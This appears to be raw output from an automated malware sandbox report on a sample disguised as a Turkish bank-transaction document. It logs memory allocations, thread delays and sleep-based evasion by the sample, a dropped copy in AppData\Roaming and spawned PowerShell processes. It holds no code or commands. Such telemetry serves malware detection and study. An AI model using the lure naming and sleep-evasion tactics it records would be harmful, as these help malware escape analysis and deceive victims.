Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: 29A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: 2BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Memory allocated: 4BB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 9E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 2860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 26A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 8D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 9D20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 9F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: AF30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 1840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 32C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Memory allocated: 3070000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239704	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239529	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239340	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 239080	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238954	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238840	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238735	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238589	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238484	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238375	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238266	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238156	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 238047	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237938	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237813	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237688	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237578	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237466	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237360	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237250	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237141	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 237030	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236916	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236812	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236704	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236594	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236469	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 236047	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235719	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235500	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235355	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235210	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 235068	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 234922	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599666	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599324	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598655	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598547	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598318	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598188	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597859	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597750	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597200	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 597075	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596967	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596748	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596311	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595859	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595611	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595463	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594904	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594687	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594468	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594359	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594250	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Thread delayed: delay time: 594111	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239890	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239781	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239672	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239547	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 239304	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238641	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238531	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238420	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238307	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238202	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 238088	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 237984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 237875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599890
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599781
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599640
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599530
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599416
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599312
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599203
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 599093
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598984
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598874
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598765
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598644
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598525
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598421
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598251
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 598079
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597968
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597859
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597750
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597640
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597531
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597421
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597312
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597203
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 597092
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596984
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596872
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596765
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596656
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596547
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596437
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596328
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596217
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596109
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 596000
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595887
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595781
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595601
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595473
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595342
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594515
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594406
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594293
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Thread delayed: delay time: 594187

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Window / User API: threadDelayed 1702	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Window / User API: threadDelayed 3727	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7929	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 877	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6700	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 652	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Window / User API: threadDelayed 3201	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe	Window / User API: threadDelayed 6644	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Window / User API: threadDelayed 816	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Window / User API: threadDelayed 1721	Jump to behavior
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Window / User API: threadDelayed 3068
Source: C:\Users\user\AppData\Roaming\UDYiGmDlq.exe	Window / User API: threadDelayed 6778

Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -18446744073709540s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -239704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -239529s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -239340s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -239080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238840s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238589s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -238047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237466s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -237030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -236916s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -236812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -236704s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -236594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -236469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -236047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -235719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -235500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -235355s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -235210s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -235068s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 5488	Thread sleep time: -234922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 6604	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7196	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3376	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7188	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7592	Thread sleep count: 3201 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7592	Thread sleep count: 6644 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599666s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599324s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598655s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598318s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -598078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe TID: 7564	Thread sleep time: -597968s >= -30000s	Jump to behavior
